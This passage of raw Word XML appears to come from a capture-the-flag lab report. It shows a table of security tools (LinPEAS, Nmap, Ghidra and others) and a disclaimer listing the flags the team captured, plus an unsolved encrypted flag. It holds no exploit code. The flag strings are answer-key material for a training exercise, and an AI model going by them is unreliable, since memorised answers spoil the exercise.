            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Application Security Testing Software</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D85809" w:rsidRPr="002355AE" w14:paraId="4FA14E8B" w14:textId="77777777" w:rsidTr="00D8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9FEB46" w14:textId="21E859F5" w:rsidR="00D85809" w:rsidRPr="002355AE" w:rsidRDefault="00D85809" w:rsidP="00194A65">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LinPEAS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F118E2F" w14:textId="25CBF15A" w:rsidR="00D85809" w:rsidRPr="002355AE" w:rsidRDefault="00D85809" w:rsidP="00194A65">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>20221113</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4530" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F886BEE" w14:textId="39A4E3FA" w:rsidR="00D85809" w:rsidRPr="002355AE" w:rsidRDefault="00D85809" w:rsidP="00194A65">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Linux Privilege </w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D85809" w:rsidRPr="002355AE" w14:paraId="2E21525A" w14:textId="77777777" w:rsidTr="00D85809">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A4F1677" w14:textId="29F22ECB" w:rsidR="00D85809" w:rsidRPr="002355AE" w:rsidRDefault="00D85809" w:rsidP="00194A65">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ghidra</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="471DC99E" w14:textId="080774A9" w:rsidR="00D85809" w:rsidRPr="002355AE" w:rsidRDefault="00D85809" w:rsidP="00194A65">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>10.2.2 dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4530" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CCC8BF0" w14:textId="454D0D80" w:rsidR="00D85809" w:rsidRPr="002355AE" w:rsidRDefault="00D85809" w:rsidP="00194A65">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Reverse Engineering Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D85809" w:rsidRPr="002355AE" w14:paraId="2A9389DA" w14:textId="77777777" w:rsidTr="00D8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F610A35" w14:textId="1EDD4392" w:rsidR="00D85809" w:rsidRPr="002355AE" w:rsidRDefault="00D85809" w:rsidP="00194A65">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Wireshark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58D15FFB" w14:textId="4EB82C19" w:rsidR="00D85809" w:rsidRPr="002355AE" w:rsidRDefault="00D85809" w:rsidP="00194A65">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4530" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="735BFA05" w14:textId="6078FE24" w:rsidR="00D85809" w:rsidRPr="002355AE" w:rsidRDefault="00D85809" w:rsidP="00194A65">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Network Protocol Analyzer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D85809" w:rsidRPr="002355AE" w14:paraId="1E9A2D6C" w14:textId="77777777" w:rsidTr="00D85809">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0770386F" w14:textId="3A834945" w:rsidR="00D85809" w:rsidRPr="002355AE" w:rsidRDefault="00D85809" w:rsidP="00194A65">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7731B24B" w14:textId="0577D2E3" w:rsidR="00D85809" w:rsidRPr="002355AE" w:rsidRDefault="00D85809" w:rsidP="00194A65">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>7.92</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4530" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4891DB62" w14:textId="62FBD03D" w:rsidR="00D85809" w:rsidRPr="002355AE" w:rsidRDefault="00D85809" w:rsidP="00194A65">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Network </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Portscanner</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D85809" w:rsidRPr="002355AE" w14:paraId="5D9A06BA" w14:textId="77777777" w:rsidTr="00D8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E95D6F" w14:textId="7A79A0AE" w:rsidR="00D85809" w:rsidRPr="002355AE" w:rsidRDefault="00D85809" w:rsidP="00194A65">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Binwalk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BB2495C" w14:textId="7AE60F86" w:rsidR="00D85809" w:rsidRPr="002355AE" w:rsidRDefault="00D85809" w:rsidP="00194A65">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2.3.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4530" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41B526B0" w14:textId="38243FBD" w:rsidR="00D85809" w:rsidRPr="002355AE" w:rsidRDefault="00D85809" w:rsidP="00194A65">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Firmware Analysis Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00967BAB" w:rsidRPr="002355AE" w14:paraId="4D6E1CED" w14:textId="77777777" w:rsidTr="00D85809">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F0154F3" w14:textId="209DC2B4" w:rsidR="00967BAB" w:rsidRPr="002355AE" w:rsidRDefault="00967BAB" w:rsidP="00194A65">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Chrome</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6124C0EC" w14:textId="0F03579F" w:rsidR="00967BAB" w:rsidRPr="002355AE" w:rsidRDefault="00967BAB" w:rsidP="00194A65">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00967BAB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>104.0.5112.101</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4530" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A0A04FC" w14:textId="0E874409" w:rsidR="00967BAB" w:rsidRPr="002355AE" w:rsidRDefault="00967BAB" w:rsidP="00194A65">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Web browser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00967BAB" w:rsidRPr="002355AE" w14:paraId="12241DF1" w14:textId="77777777" w:rsidTr="00D8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5FE0152" w14:textId="120E258A" w:rsidR="00967BAB" w:rsidRDefault="00967BAB" w:rsidP="00194A65">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Curl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C8587D2" w14:textId="0D18A5C6" w:rsidR="00967BAB" w:rsidRPr="00967BAB" w:rsidRDefault="00967BAB" w:rsidP="00194A65">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>7.83.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4530" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59B865BE" w14:textId="1B2A2951" w:rsidR="00967BAB" w:rsidRDefault="00967BAB" w:rsidP="00194A65">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>CLI data transfer over network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00967BAB" w:rsidRPr="002355AE" w14:paraId="463B8348" w14:textId="77777777" w:rsidTr="00D85809">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75D91639" w14:textId="243FFBF3" w:rsidR="00967BAB" w:rsidRDefault="00967BAB" w:rsidP="00194A65">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Firefox</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24368F5B" w14:textId="52B6E63B" w:rsidR="00967BAB" w:rsidRDefault="00967BAB" w:rsidP="00194A65">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>104.0.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4530" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C265945" w14:textId="3DB882EB" w:rsidR="00967BAB" w:rsidRDefault="00967BAB" w:rsidP="00194A65">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Web browser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="20CCA57D" w14:textId="77777777" w:rsidR="00194A65" w:rsidRPr="002355AE" w:rsidRDefault="00194A65" w:rsidP="00194A65">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54126015" w14:textId="77777777" w:rsidR="006051D3" w:rsidRDefault="006051D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="01141E3E" w14:textId="1BACED25" w:rsidR="00BD0B0F" w:rsidRDefault="006051D3" w:rsidP="006051D3">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc119794125"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Disclaimer</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="64B8A479" w14:textId="55731EB3" w:rsidR="006051D3" w:rsidRDefault="006051D3" w:rsidP="0056617F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We did not include a write up to every flag we found, only the most important once, as well as those with the highest impact on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A29A430" w14:textId="77777777" w:rsidR="0056617F" w:rsidRDefault="006051D3" w:rsidP="0056617F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We had a lead on the flag that is stored in </w:t>
      </w:r>
      <w:r w:rsidRPr="0056617F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/root/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0056617F" w:rsidRPr="0056617F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vese</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0056617F" w:rsidRPr="0056617F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-admin/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0056617F" w:rsidRPr="0056617F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>logs</w:t>
      </w:r>
      <w:r w:rsidR="0056617F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, but</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0056617F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> could not solve that in time. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74105D39" w14:textId="77523979" w:rsidR="0056617F" w:rsidRDefault="0056617F" w:rsidP="0056617F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The encrypted flag is this one: </w:t>
      </w:r>
      <w:r w:rsidRPr="0056617F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>9c9d0ea76e72a58e0ccd45f2c56f2e7771cf3ed59b6ab433780e1deb2372bf19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2009B203" w14:textId="06742979" w:rsidR="006051D3" w:rsidRDefault="006051D3" w:rsidP="0056617F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">All the flags we found can be found here: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE330D2" w14:textId="77777777" w:rsidR="006051D3" w:rsidRPr="006051D3" w:rsidRDefault="006051D3" w:rsidP="006051D3">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006051D3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{FLAG_INTWEBSI_SQLI_306481}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD4B072" w14:textId="77777777" w:rsidR="006051D3" w:rsidRPr="006051D3" w:rsidRDefault="006051D3" w:rsidP="006051D3">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006051D3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{FLAG_MAINHOST_CREV_115070}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D81DC2D" w14:textId="77777777" w:rsidR="006051D3" w:rsidRPr="006051D3" w:rsidRDefault="006051D3" w:rsidP="006051D3">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006051D3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{FLAG_MAINHOST_FASU_172836}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E8B796" w14:textId="77777777" w:rsidR="006051D3" w:rsidRPr="006051D3" w:rsidRDefault="006051D3" w:rsidP="006051D3">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006051D3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{FLAG_MAINHOST_RUBD_507598}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD7DE77" w14:textId="77777777" w:rsidR="006051D3" w:rsidRPr="006051D3" w:rsidRDefault="006051D3" w:rsidP="006051D3">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006051D3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{FLAG_PSEUTERM_COIN_256579}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477E6780" w14:textId="77777777" w:rsidR="006051D3" w:rsidRPr="006051D3" w:rsidRDefault="006051D3" w:rsidP="006051D3">
      <w:pPr>
